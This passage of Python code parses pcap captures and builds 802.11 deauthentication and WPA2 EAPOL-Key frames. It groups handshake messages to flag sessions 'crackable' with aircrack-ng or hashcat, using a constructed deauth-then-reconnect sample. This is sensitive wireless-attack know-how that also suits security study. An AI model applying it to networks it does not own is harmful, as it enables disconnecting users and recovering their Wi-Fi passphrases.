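    hdr = struct.pack("<BBH6s6s6sH", 0xC0, 0, 0, mac(dst), mac(src), mac(bssid), seq << 4)
    return hdr + struct.pack("<H", reason)

def build_eapol_key(bssid, client, from_ap, key_info, replay, nonce, seq=0):
    """Data frame carrying one EAPOL-Key message (IV, MIC and key data left zeroed)."""
    fc1, a1, a2 = (0x02, mac(client), mac(bssid)) if from_ap else (0x01, mac(bssid), mac(client))
    hdr = struct.pack("<BBH6s6s6sH", 0x08, fc1, 0, a1, a2, mac(bssid), seq << 4)
    body = struct.pack(">BHHQ32s16s8s8s16sH", 2, key_info, 16, replay, nonce,
                       bytes(16), bytes(8), bytes(8), bytes(16), 0)
    return hdr + LLC_SNAP_EAPOL + struct.pack(">BBH", 2, 3, len(body)) + body

def parse_frame(frame):
    """Dict for a deauth or pairwise EAPOL-Key frame, None for anything else."""
    if len(frame) < 26:
        return None
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 3, fc0 >> 4
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if ftype == 0 and subtype == 12:
        return {"kind": "deauth", "dst": fmt(a1), "src": fmt(a2), "bssid": fmt(a3),
                "reason": struct.unpack_from("<H", frame, 24)[0]}
    if ftype != 2:
        return None
    off = 24 + (2 if subtype & 0x08 else 0) + (6 if fc1 & 0x03 == 0x03 else 0)  # QoS field, WDS addr4
    if len(frame) < off + 57 or frame[off:off + 8] != LLC_SNAP_EAPOL or frame[off + 9] != 3:
        return None  # not EAPOL, or EAPOL but not type 3 (EAPOL-Key)
    _desc, ki, _klen, replay, nonce = struct.unpack_from(">BHHQ32s", frame, off + 12)
    if not ki & KI_PAIRWISE:
        return None  # group-key handshake: nothing derived from the PSK
    # RSN (WPA2) flags: M1 = ACK; M2 = MIC; M3 = ACK+MIC+Install+Secure; M4 = MIC+Secure
    msg = {(1, 0, 0, 0): 1, (0, 1, 0, 0): 2, (1, 1, 1, 1): 3, (0, 1, 0, 1): 4}.get(
        tuple(int(bool(ki & b)) for b in (KI_ACK, KI_MIC, KI_INSTALL, KI_SECURE)))
    if msg is None:
        return None
    # ToDS (station -> AP): addr1 = BSSID, addr2 = client; FromDS: the reverse.  IBSS not handled.
    bssid, client = (a1, a2) if fc1 & 0x01 else (a2, a1)
    return {"kind": "eapol", "msg": msg, "bssid": fmt(bssid), "client": fmt(client),
            "replay": replay, "nonce": nonce}

def find_handshakes(frames):
    """Group EAPOL-Key messages per (BSSID, client).  Crackable once an M2 (SNonce + MIC) pairs
    with the M1 (ANonce) of the same replay counter, or with an M3 whose counter is one higher."""
    sessions = {}
    for p in filter(None, map(parse_frame, frames)):
        if p["kind"] == "eapol":
            s = sessions.setdefault((p["bssid"], p["client"]), {"msgs": [], "usable": False})
            s["msgs"].append((p["msg"], p["replay"]))
    for s in sessions.values():
        rc = {m: {r for n, r in s["msgs"] if n == m} for m in (1, 2, 3)}
        s["usable"] = any(r in rc[1] or r + 1 in rc[3] for r in rc[2])
    return sessions

def count_deauths(frames):
    return sum(1 for p in map(parse_frame, frames) if p and p["kind"] == "deauth")

def frames_from_pcap(data):
    """Yield 802.11 frames from a classic pcap: link type 105 (bare) or 127 (radiotap, skipped)."""
    magic = struct.unpack_from("<I", data)[0]
    e = "<" if magic in (0xA1B2C3D4, 0xA1B23C4D) else ">"
    linktype, off = struct.unpack_from(e + "I", data, 20)[0], 24
    while off + 16 <= len(data):
        caplen = struct.unpack_from(e + "I", data, off + 8)[0]
        pkt, off = data[off + 16:off + 16 + caplen], off + 16 + caplen
        if linktype == 127:
            pkt = pkt[struct.unpack_from("<H", pkt, 2)[0]:]  # radiotap length, little-endian
        if linktype in (105, 127):
            yield pkt

def build_pcap(frames, linktype=105):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    return out + b"".join(struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
                          for i, f in enumerate(frames))

# Constructed sample: one injected deauth, then the client's reconnect handshake.
AP, STA = "02:00:00:00:01:00", "02:00:00:00:02:00"  # locally administered, not real devices
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
SAMPLE_FRAMES = [
    build_deauth(STA, AP, AP, reason=7),
    build_eapol_key(AP, STA, True, 0x008A, 1, ANONCE),      # M1
    build_eapol_key(AP, STA, False, 0x010A, 1, SNONCE),     # M2
    build_eapol_key(AP, STA, True, 0x13CA, 2, ANONCE),      # M3
    build_eapol_key(AP, STA, False, 0x030A, 2, bytes(32)),  # M4
]
```

To run it against a real capture, pass `frames_from_pcap(open("handshake.pcap", "rb").read())` (hypothetical filename) to `find_handshakes`; a session reported as `usable` is the one worth feeding to aircrack-ng or hashcat, and the same Key Information bits are what you inspect by hand after Wireshark's `eapol` display filter.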